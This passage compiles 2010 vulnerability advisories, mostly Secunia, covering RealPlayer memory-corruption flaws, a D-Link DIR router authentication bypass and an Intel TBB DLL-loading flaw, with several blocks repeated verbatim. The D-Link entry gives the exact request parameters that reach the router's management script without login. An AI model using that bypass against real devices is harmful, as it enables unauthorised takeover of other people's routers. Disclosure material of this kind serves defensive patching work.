heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ====================================================================== 2) Severity Rating: Highly critical Impact: System access Where: From remote ====================================================================== 3) Vendor's Description of Software "RealPlayer\xae SP lets you download video from thousands of Websites \x96 free! Just click on the "download this video" button above the video you want. It's just that easy. Now you can watch your favorite videos anywhere, anytime." Product Link: http://www.real.com/realplayer/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in RealPlayer, which can be exploited by malicious people to potentially compromise a user's system. ====================================================================== 6) Time Table 26/02/2010 - Vendor notified. 01/03/2010 - Vendor response. 11/03/2010 - Vendor provides status update. 19/10/2010 - Vendor provides status update. 29/11/2010 - Vendor provides status update. 10/12/2010 - Public disclosure. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-2579 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-14/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ======================================================================

RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, and Mac RealPlayer 11.0 through 12.0.0.1444 do not properly parse spectral data in AAC files, which has unspecified impact and remote attack vectors. Real Networks RealPlayer is prone to a memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ====================================================================== 2) Severity Rating: Highly critical Impact: System compromise Where: Remote ====================================================================== 3) Vendor's Description of Software "RealPlayer\xae SP lets you download video from thousands of Websites \x96 free! Just click on the "download this video" button above the video you want. It's just that easy. Now you can watch your favorite videos anywhere, anytime." Product Link: http://www.real.com/realplayer/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in RealPlayer, which can be exploited by malicious people to compromise a user's system. ====================================================================== 6) Time Table 01/03/2010 - Vendor notified. 01/03/2010 - Vendor response. 11/03/2010 - Vendor provides status update. 19/10/2010 - Vendor provides status update. 29/11/2010 - Vendor provides status update. 10/12/2010 - Public disclosure. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-0125 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-15/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ======================================================================

The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 does not properly perform initialization, which has unspecified impact and attack vectors. Real Networks RealPlayer is prone to a memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ====================================================================== 2) Severity Rating: Highly critical Impact: System access Where: From remote ====================================================================== 3) Vendor's Description of Software "RealPlayer\xae SP lets you download video from thousands of Websites \x96 free! Just click on the "download this video" button above the video you want. It's just that easy. Now you can watch your favorite videos anywhere, anytime." Product Link: http://www.real.com/realplayer/ ====================================================================== 4) Description of Vulnerability Secunia Research has discovered a vulnerability in RealPlayer, which can be exploited by malicious people to potentially compromise a user's system. ====================================================================== 6) Time Table 24/02/2010 - Vendor notified. 25/02/2010 - Vendor response. 11/03/2010 - Vendor provides status update. 19/10/2010 - Vendor provides status update. 29/11/2010 - Vendor provides status update. 10/12/2010 - Public disclosure. ====================================================================== 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-0121 for the vulnerability. ====================================================================== 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ ====================================================================== 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-9/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ======================================================================

D-Link DIR is a wireless router for the SOHO series. The D-Link DIR implementation has an error that allows remote attackers to bypass security restrictions and modify device configuration. The device does not correctly restrict access to the \"bsc_lan.php\" script. Requests with \"NO_NEED_AUTH\" parameter \"1\" and \"AUTH_GROUP\" parameter \"0\" can directly access the management interface. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: D-Link DIR Routers "bsc_lan.php" Security Issue SECUNIA ADVISORY ID: SA42425 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42425/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42425 RELEASE DATE: 2010-12-07 DISCUSS ADVISORY: http://secunia.com/advisories/42425/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42425/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42425 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Craig Heffner has reported a security issue in multiple D-Link DIR routers, which can be exploited by malicious people to bypass certain security restrictions and compromise a vulnerable device. This may be related to vulnerability #5: SA33692 SOLUTION: Restrict access to trusted hosts only (e.g. via network access control lists). PROVIDED AND/OR DISCOVERED BY: Craig Heffner ORIGINAL ADVISORY: http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Untrusted search path vulnerability in tbb.dll in Intel Threading Building Blocks (TBB) 2.2.013 allows local users to gain privileges via a Trojan horse tbbmalloc.dll file in the current working directory, as demonstrated by a directory that contains a .pbk file. NOTE: some of these details are obtained from third party information. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. http://cwe.mitre.org/data/definitions/426.htmlA local user can create a Trojan horse in the current working directory. tbbmalloc.dll It may be possible to get permission through the file. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Intel Threading Building Blocks (TBB) Insecure Library Loading Vulnerability SECUNIA ADVISORY ID: SA42506 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42506/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42506 RELEASE DATE: 2010-12-07 DISCUSS ADVISORY: http://secunia.com/advisories/42506/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42506/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42506 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been discovered in Intel Threading Building Blocks (TBB), which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the "tbb.dll" loading libraries (e.g. tbbmalloc.dll) in an insecure manner. This can be exploited to load arbitrary libraries when an application using this library e.g. opens a file located on a remote WebDAV or SMB share. Successful exploitation allows execution of arbitrary code. The vulnerability is confirmed in version 2.2.013. Other versions may also be affected. SOLUTION: Upgrade to version 3.0.4.127. PROVIDED AND/OR DISCOVERED BY: Originally reported in a CORE IMPACT exploit module for Adobe 